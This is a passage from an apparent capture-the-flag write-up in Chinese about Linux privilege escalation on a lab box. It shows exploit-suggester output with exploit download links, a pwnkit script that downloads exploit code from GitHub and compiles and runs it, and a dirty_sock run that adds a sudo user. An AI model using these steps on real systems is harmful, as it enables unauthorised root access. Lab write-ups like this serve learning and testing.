   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2022-2586] nft_object UAF

   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: less probable
   Tags: ubuntu=(20.04){kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2019-7304] dirty_sock

   Details: https://initblog.com/2019/dirty-sock/
   Exposure: less probable
   Tags: ubuntu=18.10,mint=19
   Download URL: https://github.com/initstring/dirty_sock/archive/master.zip
   Comments: Distros use own versioning scheme. Manual verification needed.

[+] [CVE-2019-18634] sudo pwfeedback

   Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
   Exposure: less probable
   Tags: mint=19
   Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
   Comments: sudo configuration requires pwfeedback to be enabled.

[+] [CVE-2019-15666] XFRM_UAF

   Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
   Exposure: less probable
   Download URL: 
   Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled

[+] [CVE-2017-5618] setuid screen v4.5.0 LPE

   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154

[+] [CVE-2017-0358] ntfs-3g-modprobe

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
   Exposure: less probable
   Tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2}
   Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41356.zip
   Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.

因为暂时没什么好办法试试内核提权把。

pwnkit

直接从https://codeload.github.com/berdav/CVE-2021-4034/zip/main下载，从里面的.sh文件拷贝内容直接在靶机创建一个exp.sh。尝试执行。

www-data@petshop:/tmp$ cat exp.sh
cat exp.sh
#!/usr/bin/env sh

URL=https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/

for EXPLOIT in "${URL}/cve-2021-4034.c" \
               "${URL}/pwnkit.c" \
               "${URL}/Makefile"
do
    curl -sLO "$EXPLOIT" || wget --no-hsts -q "$EXPLOIT" -O "${EXPLOIT##*/}"
done

make

./cve-2021-4034
www-data@petshop:/tmp$ chmod 777 exp.sh
chmod 777 exp.sh
www-data@petshop:/tmp$ ./exp.sh
./exp.sh
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.
# whoami
whoami
root
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

发现直接成功提权了

dirtysock

除了pwnkit，dirtysock也可以实现提权。其实dirtysock的利用脚本有两个，但是version 1的版本需要用到自己生成的rsa公钥，懒得弄了，version2可以直接创建用户更方便，就直接用version2试试，不行再用回1。

www-data@petshop:/tmp$ python3 ./4	
python3 ./46362 

      ___  _ ____ ___ _   _     ____ ____ ____ _  _ 
      |  \ | |__/  |   \_/      [__  |  | |    |_/  
      |__/ | |  \  |    |   ___ ___] |__| |___ | \_ 
                       (version 2)

//=========[]==========================================\\
|| R&D     || initstring (@init_string)                ||
|| Source  || https://github.com/initstring/dirty_sock ||
|| Details || https://initblog.com/2019/dirty-sock     ||
\\=========[]==========================================//


[+] Slipped dirty sock on random socket file: /tmp/daqnoauofi;uid=0;
[+] Binding to socket file...
[+] Connecting to snapd API...
[+] Deleting trojan snap (and sleeping 5 seconds)...
[+] Installing the trojan snap (and sleeping 8 seconds)...
[+] Deleting trojan snap (and sleeping 5 seconds)...



********************
Success! You can now `su` to the following account and use sudo:
   username: dirty_sock
   password: dirty_sock
********************



www-data@petshop:/tmp$ su dirty_sock
su dirty_sock
su: must be run from a terminal
www-data@petshop:/tmp$ python3 -c "import pty;pty.spawn('/bin/bash')"
python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@petshop:/tmp$ su dirty_sock
su dirty_sock
Password: dirty_sock

To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

dirty_sock@petshop:/tmp$ id
id
uid=1001(dirty_sock) gid=1001(dirty_sock) groups=1001(dirty_sock),27(sudo)
dirty_sock@petshop:/tmp$ sudo su
sudo su
[sudo] password for dirty_sock: dirty_sock

root@petshop:/tmp# cd /root
cd /root
root@petshop:~# ls -la
ls -la
total 24
drwx------  3 root root 4096 Jun  3 18:32 .
drwxr-xr-x 23 root root 4096 Apr  9  2021 ..
lrwxrwxrwx  1 root root    9 Apr 10  2021 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-r--------  1 root root   38 Apr 30  2021 root.txt
drwx------  3 root root 4096 Jun  3 18:32 snap
root@petshop:~# cat ro	
cat root.txt 
THM{get_it_urself}
root@petshop:~#

可以成功拿到root flag。

≡